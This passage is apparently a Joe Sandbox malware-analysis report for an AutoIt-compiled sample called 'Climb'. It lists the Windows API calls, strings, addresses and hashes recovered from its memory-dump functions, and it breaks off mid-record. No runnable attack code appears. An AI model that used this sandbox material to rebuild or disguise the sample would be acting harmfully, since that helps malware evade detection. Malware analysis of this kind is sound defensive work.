                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                                                                          • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                                                                          • API String ID: 2211948467-2373415609
                                                                                                                                                                          • Opcode ID: c59ca3b05558334c77e074487e37b4cecf7fd02682255c91dbc9b8e93e2e0427
                                                                                                                                                                          • Instruction ID: 7d519a362b66dddc9c1d4399584e15172aa42a08b8224a8737770e034d6803bf
                                                                                                                                                                          • Opcode Fuzzy Hash: c59ca3b05558334c77e074487e37b4cecf7fd02682255c91dbc9b8e93e2e0427
                                                                                                                                                                          • Instruction Fuzzy Hash: E1026072900205AFDB15DFA5CD49EAE7BBAFF48310F148558F915AB2A1CB74EE01CB60
                                                                                                                                                                          APIs
                                                                                                                                                                          • SetTextColor.GDI32(?,00000000), ref: 00AF7B67
                                                                                                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 00AF7B98
                                                                                                                                                                          • GetSysColor.USER32(0000000F), ref: 00AF7BA4
                                                                                                                                                                          • SetBkColor.GDI32(?,000000FF), ref: 00AF7BBE
                                                                                                                                                                          • SelectObject.GDI32(?,?), ref: 00AF7BCD
                                                                                                                                                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 00AF7BF8
                                                                                                                                                                          • GetSysColor.USER32(00000010), ref: 00AF7C00
                                                                                                                                                                          • CreateSolidBrush.GDI32(00000000), ref: 00AF7C07
                                                                                                                                                                          • FrameRect.USER32(?,?,00000000), ref: 00AF7C16
                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00AF7C1D
                                                                                                                                                                          • InflateRect.USER32(?,000000FE,000000FE), ref: 00AF7C68
                                                                                                                                                                          • FillRect.USER32(?,?,?), ref: 00AF7C9A
                                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00AF7CBC
                                                                                                                                                                            • Part of subcall function 00AF7E22: GetSysColor.USER32(00000012), ref: 00AF7E5B
                                                                                                                                                                            • Part of subcall function 00AF7E22: SetTextColor.GDI32(?,00AF7B2D), ref: 00AF7E5F
                                                                                                                                                                            • Part of subcall function 00AF7E22: GetSysColorBrush.USER32(0000000F), ref: 00AF7E75
                                                                                                                                                                            • Part of subcall function 00AF7E22: GetSysColor.USER32(0000000F), ref: 00AF7E80
                                                                                                                                                                            • Part of subcall function 00AF7E22: GetSysColor.USER32(00000011), ref: 00AF7E9D
                                                                                                                                                                            • Part of subcall function 00AF7E22: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00AF7EAB
                                                                                                                                                                            • Part of subcall function 00AF7E22: SelectObject.GDI32(?,00000000), ref: 00AF7EBC
                                                                                                                                                                            • Part of subcall function 00AF7E22: SetBkColor.GDI32(?,?), ref: 00AF7EC5
                                                                                                                                                                            • Part of subcall function 00AF7E22: SelectObject.GDI32(?,?), ref: 00AF7ED2
                                                                                                                                                                            • Part of subcall function 00AF7E22: InflateRect.USER32(?,000000FF,000000FF), ref: 00AF7EF1
                                                                                                                                                                            • Part of subcall function 00AF7E22: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00AF7F08
                                                                                                                                                                            • Part of subcall function 00AF7E22: GetWindowLongW.USER32(?,000000F0), ref: 00AF7F15
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4124339563-0
                                                                                                                                                                          • Opcode ID: 483254eb4faa4e8c3d0b8bf6de54bb21d87c6dc2965b8a33a996f8a29cf7e9b5
                                                                                                                                                                          • Instruction ID: c6d26be3cb657eb4670c455ed9b2ae032101db2eb38b990883a6425221ff750d
                                                                                                                                                                          • Opcode Fuzzy Hash: 483254eb4faa4e8c3d0b8bf6de54bb21d87c6dc2965b8a33a996f8a29cf7e9b5
                                                                                                                                                                          • Instruction Fuzzy Hash: B3A16C72008305AFD712DFE4DC48E7FBBAAFB49325F100A19FA62961A0D771D946CB51
                                                                                                                                                                          APIs
                                                                                                                                                                          • DestroyWindow.USER32(?,?), ref: 00A616B4
                                                                                                                                                                          • SendMessageW.USER32(?,00001308,?,00000000), ref: 00AA2B07
                                                                                                                                                                          • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00AA2B40
                                                                                                                                                                          • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00AA2F85
                                                                                                                                                                            • Part of subcall function 00A61802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00A61488,?,00000000,?,?,?,?,00A6145A,00000000,?), ref: 00A61865
                                                                                                                                                                          • SendMessageW.USER32(?,00001053), ref: 00AA2FC1
                                                                                                                                                                          • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00AA2FD8
                                                                                                                                                                          • ImageList_Destroy.COMCTL32(00000000,?), ref: 00AA2FEE
                                                                                                                                                                          • ImageList_Destroy.COMCTL32(00000000,?), ref: 00AA2FF9
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                                                                                                                                          • String ID: 0
                                                                                                                                                                          • API String ID: 2760611726-4108050209
                                                                                                                                                                          • Opcode ID: ca68d182813a468cc7152d2f346e88b04f9eb3819ab5be8c0b79a66f0d473f2d
                                                                                                                                                                          • Instruction ID: e2b09a0cd94460812e66795979571caebd0e9433defa58595041095a45b748d2
                                                                                                                                                                          • Opcode Fuzzy Hash: ca68d182813a468cc7152d2f346e88b04f9eb3819ab5be8c0b79a66f0d473f2d
                                                                                                                                                                          • Instruction Fuzzy Hash: A712A074204201EFD725DF68C984BB9BBF1FB46310F284569F4959B6A1CB31ECA2CB91
                                                                                                                                                                          APIs
                                                                                                                                                                          • DestroyWindow.USER32(00000000), ref: 00AE319B
                                                                                                                                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00AE32C7
                                                                                                                                                                          • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00AE3306
                                                                                                                                                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00AE3316
                                                                                                                                                                          • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00AE335D
                                                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 00AE3369
                                                                                                                                                                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00AE33B2
                                                                                                                                                                          • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00AE33C1
                                                                                                                                                                          • GetStockObject.GDI32(00000011), ref: 00AE33D1
                                                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00AE33D5
                                                                                                                                                                          • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00AE33E5
                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00AE33EE
                                                                                                                                                                          • DeleteDC.GDI32(00000000), ref: 00AE33F7
                                                                                                                                                                          • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00AE3423
                                                                                                                                                                          • SendMessageW.USER32(00000030,00000000,00000001), ref: 00AE343A
                                                                                                                                                                          • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00AE347A
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00AE348E
                                                                                                                                                                          • SendMessageW.USER32(00000404,00000001,00000000), ref: 00AE349F
                                                                                                                                                                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00AE34D4
                                                                                                                                                                          • GetStockObject.GDI32(00000011), ref: 00AE34DF
                                                                                                                                                                          • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00AE34EA
                                                                                                                                                                          • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00AE34F4
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                                                                          • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                                                                          • API String ID: 2910397461-517079104
                                                                                                                                                                          • Opcode ID: c0459468f495340c91474cc8645eb65db05453fdbdbf457f713b50c581cbcab8
                                                                                                                                                                          • Instruction ID: 81a1a389acdafce49db24cfb3c1fc17553ab257ab7c16f1def07b276a9ae0e3a
                                                                                                                                                                          • Opcode Fuzzy Hash: c0459468f495340c91474cc8645eb65db05453fdbdbf457f713b50c581cbcab8
                                                                                                                                                                          • Instruction Fuzzy Hash: F7B16F72A00205AFDB14DFA9DD49FAE7BB9EB08710F104115FA15E7290DB74ED41CBA4
                                                                                                                                                                          APIs
                                                                                                                                                                          • SetErrorMode.KERNEL32(00000001), ref: 00AD5532
                                                                                                                                                                          • GetDriveTypeW.KERNEL32(?,00AFDC30,?,\\.\,00AFDCD0), ref: 00AD560F
                                                                                                                                                                          • SetErrorMode.KERNEL32(00000000,00AFDC30,?,\\.\,00AFDCD0), ref: 00AD577B
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorMode$DriveType
                                                                                                                                                                          • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                                                                          • API String ID: 2907320926-4222207086
                                                                                                                                                                          • Opcode ID: f7c6591a19aa5c1c4b829aeeefb4cd5acc05dc44ada1b3a2164335d460ef317b
                                                                                                                                                                          • Instruction ID: d6758b85574417292a9da0aae0222f1bbf08133fd84c6e8dcd639ec5096854ba
                                                                                                                                                                          • Opcode Fuzzy Hash: f7c6591a19aa5c1c4b829aeeefb4cd5acc05dc44ada1b3a2164335d460ef317b
                                                                                                                                                                          • Instruction Fuzzy Hash: E061B170E88905DBC724DF34DA929B877B1BF04350B3448A7E42BAB3A1DA31ED42CB55
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetCursorPos.USER32(?), ref: 00AF1BC4
                                                                                                                                                                          • GetDesktopWindow.USER32 ref: 00AF1BD9
                                                                                                                                                                          • GetWindowRect.USER32(00000000), ref: 00AF1BE0
                                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00AF1C35
                                                                                                                                                                          • DestroyWindow.USER32(?), ref: 00AF1C55
                                                                                                                                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00AF1C89
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00AF1CA7
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00AF1CB9
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000421,?,?), ref: 00AF1CCE
                                                                                                                                                                          • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00AF1CE1
                                                                                                                                                                          • IsWindowVisible.USER32(00000000), ref: 00AF1D3D
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00AF1D58
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00AF1D6C
                                                                                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 00AF1D84
                                                                                                                                                                          • MonitorFromPoint.USER32(?,?,00000002), ref: 00AF1DAA
                                                                                                                                                                          • GetMonitorInfoW.USER32(00000000,?), ref: 00AF1DC4
                                                                                                                                                                          • CopyRect.USER32(?,?), ref: 00AF1DDB
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000412,00000000), ref: 00AF1E46
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                                                                          • String ID: ($0$tooltips_class32
                                                                                                                                                                          • API String ID: 698492251-4156429822
                                                                                                                                                                          • Opcode ID: d8b1836368d05af304d1adc3e5f6ad14a89a21ebcf39f222dd04fda7540b77ef
                                                                                                                                                                          • Instruction ID: 2027e5d21cf12bd7995ff4c90e34bb19bd8f19a356b9dd0efcdee4aadf63bfde
                                                                                                                                                                          • Opcode Fuzzy Hash: d8b1836368d05af304d1adc3e5f6ad14a89a21ebcf39f222dd04fda7540b77ef
                                                                                                                                                                          • Instruction Fuzzy Hash: 7EB16971604345EFD714DFA5C984B6AFBE5FF84310F008919FA999B2A1CB31E845CBA2
                                                                                                                                                                          APIs
                                                                                                                                                                          • CharUpperBuffW.USER32(?,?), ref: 00AF0D81
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00AF0DBB
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00AF0E25
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00AF0E8D
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00AF0F11
                                                                                                                                                                          • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00AF0F61
                                                                                                                                                                          • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00AF0FA0
                                                                                                                                                                            • Part of subcall function 00A7FD52: _wcslen.LIBCMT ref: 00A7FD5D
                                                                                                                                                                            • Part of subcall function 00AC2B8C: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00AC2BA5
                                                                                                                                                                            • Part of subcall function 00AC2B8C: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00AC2BD7
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                                                                          • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                                                                                          • API String ID: 1103490817-719923060
                                                                                                                                                                          • Opcode ID: f76e29ef29b1983b426844caa36a2a17893b148c95f0c451438fd74241a9adee
                                                                                                                                                                          • Instruction ID: 796d7768df283fa684a075c0d1092e2c07b0d744a6098cd1be8ddad602afb532
                                                                                                                                                                          • Opcode Fuzzy Hash: f76e29ef29b1983b426844caa36a2a17893b148c95f0c451438fd74241a9adee
                                                                                                                                                                          • Instruction Fuzzy Hash: B9E1D0322083458FC714DF64CA5093AB3E6FF88354B14896DF99A9B3A2DB30ED45CB91
                                                                                                                                                                          APIs
                                                                                                                                                                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00A625F8
                                                                                                                                                                          • GetSystemMetrics.USER32(00000007), ref: 00A62600
                                                                                                                                                                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00A6262B
                                                                                                                                                                          • GetSystemMetrics.USER32(00000008), ref: 00A62633
                                                                                                                                                                          • GetSystemMetrics.USER32(00000004), ref: 00A62658
                                                                                                                                                                          • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00A62675
                                                                                                                                                                          • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00A62685
                                                                                                                                                                          • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00A626B8
                                                                                                                                                                          • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00A626CC
                                                                                                                                                                          • GetClientRect.USER32(00000000,000000FF), ref: 00A626EA
                                                                                                                                                                          • GetStockObject.GDI32(00000011), ref: 00A62706
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 00A62711
                                                                                                                                                                            • Part of subcall function 00A619CD: GetCursorPos.USER32(?), ref: 00A619E1
                                                                                                                                                                            • Part of subcall function 00A619CD: ScreenToClient.USER32(00000000,?), ref: 00A619FE
                                                                                                                                                                            • Part of subcall function 00A619CD: GetAsyncKeyState.USER32(00000001), ref: 00A61A23
                                                                                                                                                                            • Part of subcall function 00A619CD: GetAsyncKeyState.USER32(00000002), ref: 00A61A3D
                                                                                                                                                                          • SetTimer.USER32(00000000,00000000,00000028,00A6199C), ref: 00A62738
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                                                                          • String ID: AutoIt v3 GUI
                                                                                                                                                                          • API String ID: 1458621304-248962490
                                                                                                                                                                          • Opcode ID: e1ee1d72efba7b981b3ea86776a0f63d7d6881f568db96e6dc4a1bf89121ef3d
                                                                                                                                                                          • Instruction ID: b8238ba2d6c00cd8950f8bd742da1f19bbd10e2fe791cda6fd0359eeb8d9e5ec
                                                                                                                                                                          • Opcode Fuzzy Hash: e1ee1d72efba7b981b3ea86776a0f63d7d6881f568db96e6dc4a1bf89121ef3d
                                                                                                                                                                          • Instruction Fuzzy Hash: ABB17A72A002099FDF15DFA8CC55BAE7BB5FB48314F104229FA06AB2E0DB74E941CB51
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00AC1A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00AC1A60
                                                                                                                                                                            • Part of subcall function 00AC1A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,00AC14E7,?,?,?), ref: 00AC1A6C
                                                                                                                                                                            • Part of subcall function 00AC1A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00AC14E7,?,?,?), ref: 00AC1A7B
                                                                                                                                                                            • Part of subcall function 00AC1A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00AC14E7,?,?,?), ref: 00AC1A82
                                                                                                                                                                            • Part of subcall function 00AC1A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00AC1A99
                                                                                                                                                                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00AC1741
                                                                                                                                                                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00AC1775
                                                                                                                                                                          • GetLengthSid.ADVAPI32(?), ref: 00AC178C
                                                                                                                                                                          • GetAce.ADVAPI32(?,00000000,?), ref: 00AC17C6
                                                                                                                                                                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00AC17E2
                                                                                                                                                                          • GetLengthSid.ADVAPI32(?), ref: 00AC17F9
                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00AC1801
                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 00AC1808
                                                                                                                                                                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00AC1829
                                                                                                                                                                          • CopySid.ADVAPI32(00000000), ref: 00AC1830
                                                                                                                                                                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00AC185F
                                                                                                                                                                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00AC1881
                                                                                                                                                                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00AC1893
                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00AC18BA
                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 00AC18C1
                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00AC18CA
                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 00AC18D1
                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00AC18DA
                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 00AC18E1
                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00AC18ED
                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 00AC18F4
                                                                                                                                                                            • Part of subcall function 00AC1ADF: GetProcessHeap.KERNEL32(00000008,00AC14FD,?,00000000,?,00AC14FD,?), ref: 00AC1AED
                                                                                                                                                                            • Part of subcall function 00AC1ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,00AC14FD,?), ref: 00AC1AF4
                                                                                                                                                                            • Part of subcall function 00AC1ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00AC14FD,?), ref: 00AC1B03
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4175595110-0
                                                                                                                                                                          • Opcode ID: 2b6fbee4a4d5bf519b8410a060817ce7eb9a05b3f3daaf8b9ee829015320344f
                                                                                                                                                                          • Instruction ID: 14c1f2d8bf9c318925f5add4a563ac61c8305f3e3c6f1adb8175d7ae9d223ced
